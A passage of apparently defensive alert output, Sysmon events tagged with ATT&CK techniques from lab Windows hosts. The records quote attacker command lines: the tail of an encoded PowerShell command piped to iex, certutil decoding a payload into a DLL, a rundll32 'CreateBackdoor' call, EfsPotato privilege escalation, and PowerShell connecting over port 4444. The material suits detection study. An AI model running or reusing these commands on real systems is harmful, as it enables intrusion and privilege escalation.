AYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5532 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 15:08:07.355 747F3D96-A357-5D45-0000-0010BD149A01 5396 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-A356-5D45-0000-001014F99901 4056 C:\Windows\System32\mmc.exe "C:\Windows\System32\mmc.exe" eventvwr.msc ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1589296009.450298,2020-05-12T19:06:49.450298+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 143189 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-12 15:06:49.415 747F3D96-BB89-5EBA-0000-001019683600 4688 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe c:\Windows\System32\cmd.exe C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-B086-5EBA-0000-0020BF9E0800 0x89ebf 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-BB89-5EBA-0000-001042653600 1088 C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\certutil.exe) with commandline ( certutil -f -decode fi.b64 AllTheThings.dll )",1," 1 5 4 1 0 0x8000000000000000 4890 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:32:58.940 747F3D96-660A-5D3F-0000-0010FFF28500 700 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil -f -decode fi.b64 AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-660A-5D3F-0000-0010B9E08500 3184 C:\Windows\System32\cmd.exe cmd /c certutil -f -decode fi.b64 AllTheThings.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 16150 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-11 18:10:42.653 365ABB72-1022-5CD7-0000-0010DF121C00 3248 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation c:\Windows\System32\cmd.exe C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ NT AUTHORITY\SYSTEM 365ABB72-8693-5CD7-0000-0020E7030000 0x3e7 1 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-8693-5CD7-0000-0010765E0000 492 C:\Windows\System32\lsass.exe C:\Windows\system32\lsass.exe ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1," 1 5 4 1 0 0x8000000000000000 4890 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:32:58.940 747F3D96-660A-5D3F-0000-0010FFF28500 700 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil -f -decode fi.b64 AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-660A-5D3F-0000-0010B9E08500 3184 C:\Windows\System32\cmd.exe cmd /c certutil -f -decode fi.b64 AllTheThings.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4890 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:32:58.940 747F3D96-660A-5D3F-0000-0010FFF28500 700 C:\Windows\System32\certutil.exe 10.0.17763.1 (WinBuild.160101.0800) CertUtil.exe Microsoft® Windows® Operating System Microsoft Corporation certutil -f -decode fi.b64 AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 747F3D96-660A-5D3F-0000-0010B9E08500 3184 C:\Windows\System32\cmd.exe cmd /c certutil -f -decode fi.b64 AllTheThings.dll ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," 1 5 4 1 0 0x8000000000000000 243512 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.504 747F3D96-9F61-5E75-0000-0010686A1E00 4848 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5447 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-03 12:08:19.888 747F3D96-7933-5D45-0000-0010227E0701 6000 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-D4E9-5D45-0000-0020E7030000 0x3e7 1 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-7930-5D45-0000-001055DE0601 4740 C:\Windows\System32\consent.exe consent.exe 896 318 0000028064471300 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243512 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.504 747F3D96-9F61-5E75-0000-0010686A1E00 4848 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243512 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:17.504 747F3D96-9F61-5E75-0000-0010686A1E00 4848 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," 1 5 4 1 0 0x8000000000000000 17717 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 02:32:48.342 365ABB72-28D0-5CDA-0000-0010F76F1300 3964 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /groups C:\temp\PowerShell-Suite-master\ IEWIN7\IEUser 365ABB72-26E1-5CDA-0000-002087350100 0x13587 1 Medium SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-28A0-5CDA-0000-001074181300 2016 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 17717 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 02:32:48.342 365ABB72-28D0-5CDA-0000-0010F76F1300 3964 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /groups C:\temp\PowerShell-Suite-master\ IEWIN7\IEUser 365ABB72-26E1-5CDA-0000-002087350100 0x13587 1 Medium SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-28A0-5CDA-0000-001074181300 2016 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /priv) ,1," 1 5 4 1 0 0x8000000000000000 15678 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-10 13:33:29.409 365ABB72-7DA9-5CD5-0000-00100ED31400 2524 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami /priv C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-79DF-5CD5-0000-0020F8410100 0x141f8 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-7D86-5CD5-0000-0010CC2E1400 2076 C:\Windows\System32\cmd.exe "c:\Windows\System32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 1912935 Microsoft-Windows-Sysmon/Operational LAPTOP-JU4M3I0E 2021-08-22 19:33:38.890 00247C92-A692-6122-0000-0010A5CD1F02 11328 C:\Windows\System32\whoami.exe 10.0.19041.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami C:\WINDOWS\system32\ NT AUTHORITY\SYSTEM 00247C92-7087-6122-0000-0020E7030000 0x3e7 0 System SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 00247C92-A691-6122-0000-001021C31F02 14048 C:\temp\EfsPotato.exe c:\temp\EfsPotato.exe whoami ",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1," 1 5 4 1 0 0x8000000000000000 4888 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:32:58.614 747F3D96-660A-5D3F-0000-0010B9E08500 3184 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c certutil -f -decode fi.b64 AllTheThings.dll C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 15677 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-10 13:32:54.034 365ABB72-7D86-5CD5-0000-0010CC2E1400 2076 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "c:\Windows\System32\cmd.exe" C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-79DF-5CD5-0000-0020F8410100 0x141f8 1 High SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-7D85-5CD5-0000-001047061400 2536 C:\Windows\System32\CompMgmtLauncher.exe "C:\Windows\System32\CompMgmtLauncher.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 8119 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-20 08:07:52.956 365ABB72-3ED8-5D0B-0000-0010398F1A00 1476 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami c:\ProgramData\ IEWIN7\IEUser 365ABB72-3991-5D0B-0000-002029350100 0x13529 1 High SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-3ED4-5D0B-0000-0010B2871A00 1440 C:\Windows\System32\cmd.exe "cmd" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," 1 5 4 1 0 0x8000000000000000 17715 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 02:32:48.290 365ABB72-28D0-5CDA-0000-00103A6B1300 2676 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /groups C:\temp\PowerShell-Suite-master\ IEWIN7\IEUser 365ABB72-26E1-5CDA-0000-002087350100 0x13587 1 Medium SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-28A0-5CDA-0000-001074181300 2016 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," 1 5 4 1 0 0x8000000000000000 17715 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-14 02:32:48.290 365ABB72-28D0-5CDA-0000-00103A6B1300 2676 C:\Windows\System32\whoami.exe 6.1.7600.16385 (win7_rtm.090713-1255) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\whoami.exe" /groups C:\temp\PowerShell-Suite-master\ IEWIN7\IEUser 365ABB72-26E1-5CDA-0000-002087350100 0x13587 1 Medium SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 365ABB72-28A0-5CDA-0000-001074181300 2016 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ),1," 1 5 4 1 0 0x8000000000000000 4887 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:32:57.600 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6056-5D3F-0000-0010C9EF4100 4600 C:\Windows\explorer.exe C:\Windows\Explorer.EXE ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 342417 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-08-12 13:06:08.141 747F3D96-E940-5F33-0000-001039310F00 7460 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-E909-5F33-0000-0020E7030000 0x3e7 0 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-E93C-5F33-0000-0010A6F00E00 8032 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3," 3 5 4 3 0 0x8000000000000000 8118 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-06-20 08:07:48.721 365ABB72-3D05-5D0B-0000-001004220D00 816 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe IEWIN7\IEUser tcp false false 10.0.2.13 IEWIN7 4444 false 10.0.2.18 38208 ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," 1 5 4 1 0 0x8000000000000000 196375 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-24 01:13:54.117 747F3D96-CA52-5EC9-0000-001027FA3700 4456 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe whoami C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-BDD1-5EC9-0000-0020E7030000 0x3e7 1 System SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 747F3D96-CA4E-5EC9-0000-00109FE23700 1516 C:\Windows\System32\cmd.exe c:\Windows\System32\cmd.exe ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," 1 5 4 1 0 0x8000000000000000 5637 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-08-04 07:26:35.116 747F3D96-88AB-5D46-0000-001081ED7D03 4300 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-56A3-5D45-0000-0020B3D31800 0x18d3b3 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-88AA-5D46-0000-001093E37D03 4644 C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe") ,1," 1 5 4 1 0 0x8000000000000000 110435 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-05-02 18:01:57.417 747F3D96-B595-5EAD-0000-00106BFDC200 6004 C:\Windows\System32\whoami.exe 10.0.17763.1 (WinBuild.160101.0800) whoami - displays logged on user information Microsoft® Windows® Operating System Microsoft Corporation whoami.exe "C:\Windows\system32\whoami.exe" C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-6ABB-5EAD-0000-0020E7030000 0x3e7 0 System 